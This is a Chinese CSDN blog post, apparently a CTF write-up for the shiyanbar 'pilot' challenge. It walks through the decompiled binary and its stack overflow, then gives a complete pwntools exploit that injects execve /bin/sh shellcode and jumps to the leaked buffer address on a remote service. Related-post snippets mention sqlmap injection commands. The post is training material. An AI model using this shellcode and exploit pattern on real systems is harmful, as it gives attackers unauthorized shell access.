shiyanbar-pilot

最新推荐文章于 2021-07-13 16:44:07 发布
最新推荐文章于 2021-07-13 16:44:07 发布
阅读量166 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35661990/article/details/84639943
版权

很基础的栈溢出,先用checksec查看,什么保护都没开,基本就是用shellcode或者程序内直接有system之类的语句了

放到IDA中查看

signed __int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 v3; // rax
  __int64 v4; // rax
  __int64 v5; // rax
  __int64 v6; // rax
  __int64 v7; // rax
  __int64 v8; // rax
  __int64 v9; // rax
  __int64 v10; // rax
  __int64 v11; // rax
  __int64 v12; // rax
  char buf; // [rsp+0h] [rbp-20h]

  setvbuf(stdout, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  v3 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Welcome DropShip Pilot...");
  std::ostream::operator<<(v3, &std::endl<char,std::char_traits<char>>);
  v4 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]I am your assitant A.I....");
  std::ostream::operator<<(v4, &std::endl<char,std::char_traits<char>>);
  v5 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]I will be guiding you through the tutorial....");
  std::ostream::operator<<(v5, &std::endl<char,std::char_traits<char>>);
  v6 = std::operator<<<std::char_traits<char>>(
         &std::cout,
         "[*]As a first step, lets learn how to land at the designated location....");
  std::ostream::operator<<(v6, &std::endl<char,std::char_traits<char>>);
  v7 = std::operator<<<std::char_traits<char>>(
         &std::cout,
         "[*]Your mission is to lead the dropship to the right location and execute sequence of instructions to save Marines & Medics...");
  std::ostream::operator<<(v7, &std::endl<char,std::char_traits<char>>);
  v8 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Good Luck Pilot!....");
  std::ostream::operator<<(v8, &std::endl<char,std::char_traits<char>>);
  v9 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Location:");
  v10 = std::ostream::operator<<(v9, &buf);//打印出buf的地址
  std::ostream::operator<<(v10, &std::endl<char,std::char_traits<char>>);
  std::operator<<<std::char_traits<char>>(&std::cout, "[*]Command:");
  if ( read(0, &buf, 0x40uLL) > 4 )//buf距离rbp只有0x20字节,却可以输入0x40字节,溢出点
    return 0LL;
  v11 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]There are no commands....");
  std::ostream::operator<<(v11, &std::endl<char,std::char_traits<char>>);
  v12 = std::operator<<<std::char_traits<char>>(&std::cout, "[*]Mission Failed....");
  std::ostream::operator<<(v12, &std::endl<char,std::char_traits<char>>);
  return 0xFFFFFFFFLL;
}

整个程序的重点只有三点

1、buf距离rbp 0x20字节

2、v10 = std::ostream::operator<<(v9, &buf);打印出buf的地址

3、if ( read(0, &buf, 0x40uLL) > 4 )可以给0x20字节栈空间写入0x40字节,栈溢出,长度足够写shellcode了

最后构造payload的时候在exploit-db上找的shellcode不能用,想起学长写过题解就直接用学长的shellcode了

from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')

#target= process("./pilot")
target=remote('106.2.25.7', 8003)

target.recvuntil("[*]Location:")
buf_addr=int(target.recv(14),16)

#https://www.exploit-db.com/shellcodes/40131
#shellcode="\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x87\xe3\xb0\x0b\xcd\x80"
#execve /bin/sh
#自己找的shellcode没办法用

shellcode="\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
payload=shellcode+"a"*(0x20+8-len(shellcode))+p64(buf_addr)#用'a'把剩余的栈空间和rbp填充了

target.recvuntil(':')
target.sendline(payload)

target.interactive()

 

吾梦不尽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
实验吧-简单的登录题
r00tnb的博客
07-26 9490
前言 这是在实验吧上面的一道web题。主要考察cbc字节反转攻击。 分析 题目开始就是输入id去登录 首先想到的就是sql注入了,输入1'后页面显示Hello,重新载入的话页面返回报错信息 确实存在注入,看那后面的逗号,猜测注入点在limit后面。然后试了很多,发现题目把union,#,procedure等都过滤了,暂时没想到任何绕过的方法。然后抓包看看消息头看看有没有提示 ...
考考你的程序功底 -.shiyanbar--ctf
weixin_30402085的博客
08-30 95
吆喝!你给我来真的是吧,那我不客气了哈! 解题链接:http://ctf1.shiyanbar.com/program/1/ 数是copy别人的wp. #include<stdio.h> int main(void) { int arr[20][20] = { { 8,2,22,97,38,15,0,40,0,75,4,5,7,78,52,12,50,77,91,8...
这个看起来有点简单!-实验吧
Xi4or0uji
05-07 1357
这道题一开始点进去让人感觉有点蒙圈,不知道要考什么,后来才发现只是道简单的sql注入.........这里写两种做法。 sqlmap去跑 先去看一下有什么数据库 sqlmap -u &quot;http://ctf5.shiyanbar.com/8/index.php?id=1&quot; --dbs 有个my_db的数据库,再去扫一下有什么表 sqlmap -u &quot;http://ctf5.shiyan...
实验吧_网站综合渗透_Discuz!
test
10-21 1万+
前言 这个一个实验吧中的环境,分值为50分,下面是题目说明。诶,发现自己很菜。 你是国内一流安全公司的“安全专家”,你带领的团队负责维护国内某金融网站的安全,马上临近双十一购物节,客户要求你对重点保障网站进行“授权安全检查”,希望你能找到网站的漏洞。 操作机器IP:192.168.1.2 目标机器IP:192.168.1.3 题目说明 1、 在不影响客户业务的前提下,你对网站进行了“应用安全...
实验吧——密码学
yxl_d的博客
07-14 295
前记 做题平台:实验吧 平台网址:http://www.shiyanbar.com 围在栅栏中的爱 先拿去摩斯密码解密得到 根据 QWE到底等不等于ABC , 想到密码替换,于是 题目也提示了有栏栅加密,就拿去跑栏栅 再倒序一下就可以了 我喜欢培根 打开题目连接是一串摩斯密码 解密后得到 MORSE…–.-IS…–.-COOL…–.-BUT…–.-BACON…–.-IS…–.-COO...
阿里云开源插件log-pilot(logpilot)搜集k8s部署应用容器内日志-详细文档
06-20
[root@k8s-master yaml_log-pilot]# docker load -i log-pilot-filebeat7.tar 最后,可以使用 docker images 命令来查看 log-pilot 的镜像信息: [root@k8s-master yaml_log-pilot]# docker images |grep log-...
log-pilot:收集docker容器的日志
02-02
使用log-pilot您可以从Docker主机收集日志并将其发送到集中式日志系统,例如elasticsearch,graylog2,awsog等log-pilot不仅可以收集docker stdout,还可以收集docker容器内的日志文件。 试试吧 先决条件: 码头...
istio-pilot.tar
08-22
istio-pilot.tar镜像,istio架构组成部分;方便下载,避免镜像下载时过慢的情况,下载完成后可以手动导入镜像。
阿里云开源插件log-pilot(logpilot)搜集k8s部署应用容器内日志—超详细,超全面(带文档和相关软件包)
06-20
阿里云开源插件Log-Pilot(也称为logpilot)是一款强大的日志收集工具,专为在Kubernetes(k8s)环境中运行的应用程序设计。它能够高效地从各个容器中提取日志,并将这些日志发送到指定的存储或分析系统,以便于监控...
gcp-pilot
03-19
Google Cloud Pilot 安装 pip install gcp-pilot 一些API需要额外的软件包,因此必须使用extras添加这些: 云任务: pip install gcp-pilot[tasks] 云构建: pip install gcp-pilot[build] 云存储: pip install gcp...
这个看起来有点简单!--实验吧
Gunther的博客
08-31 2889
这个看起来有点简单! 手工检测是否存在sql注入(经典id=1'加入单引号提交,结果:如果出现错误提示,则该网站可能就存在注入漏洞) 使用sqlmap爆出当前数据库my_db 发现可能藏有key值的thiskey表 进一步爆出字段k0y并得到key值。 查看手册sql map
C语言的三种整型数据类型:int、short int和long int
飞奔的火鸟
03-15 4111
int数据类型的位数为16位,short int数据类型的位数也是16位。而long int的位数为32位,可用来存储比较大的整数。 short int 和 long int可以缩写为short 和 long。              C语言中的整型数据类型int、short int 和 long int   名称 全称类型说明符 缩写类型说明符       位数           ...
PWN栈溢出基础——ROP1.0
Gifoyle的博客
07-13 836
PWN栈溢出基础——ROP1.0 这篇文章介绍ret2text,ret2shellcode,ret2syscall(基础篇) 在中间会尽量准确地阐述漏洞利用和exp的原理,并且尽量细致地将每一步操作写出来。 参考ctf-wiki以及其他资源,参考链接见最后,文中展示的题目下载链接见评论区 1.ret2text ret2text即控制程序执行程序本身已有的代码(.text)。其实,这种攻击方法是一种笼统的描述。我们控制执行程序已有的代码的时候也可以控制程序执行好几段不相邻的程序已有的代码(也就是gadgets
int与long 两种数据类型有什么区别?|__int64固定大小为8字节,不受运行环境(的CPU和操作系统位数)影响
热门推荐
haiross的专栏
04-27 1万+
VC6.0中int与long 两种数据类型有什么区别? 在MSDN上的解释是: On 32-bit platforms, long is synonymous with int. 即:在32位机上,long与int同义。 不同的编译器会分配不同的空间,还跟计算机是多少位的有关,不过一般long是int的两倍长度。 ===============================
00000000000000000000
liumingtong的专栏
07-23 1819
00000000000000000000
pwn 练习笔记 暑假第五天
SsMing的博客
07-17 981
今天找了jarvisoj上面的两个简单题做一下 level0(难度如名字) ida打开看一下,简单栈溢出 ssize_t vulnerable_function() {   char buf; // [sp+0h] [bp-80h]@1   return read(0, &amp;buf, 0x200uLL); } int __cdecl main(int argc, const cha...
2018-11-29
まどか
11-29 118
es6的相关学习 1.由于海通社区项目不支持es6,所以好久没有接触了。正好新项目中有好多比较陌生的es6语法,借此复习 es6遍历器 (1)Iterator 接口的目的,就是为所有数据结构,提供了一种统一的访问机制,即for…of循环(详见下文)。当使用for…of循环遍历某种数据结构时,该循环会自动去寻找 Iterator 接口。 一种数据结构只要部署了 Iterator 接口,我们就...
强网杯 签到re 签到pwn 题解
qq_41071646的博客
05-27 1998
强网杯给打自闭了 最后也是没有进到第一页 比较可惜 不过手速快 抢到了 先锋的三血 感觉还不错 不得不说强网的反作弊做的真心不错 re 都能每个人的flag 不一样 真心可以 然后强网的 pwn题竟然还有用队伍 token来搞 真的秀 先说re 即可得出flag Just re 这个题目也算是签到题 首先要修复函数 虽然 上面xmmword_405018 变化...
log-pilot containerd
最新发布
05-17
log-pilot是一款为容器设计的日志收集器,它能够自动收集容器运行时产生的日志信息,并将其发送到指定的日志存储中心进行处理和分析。log-pilot的特点在于,其支持多种日志存储方案,例如Kafka、Elasticsearch、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值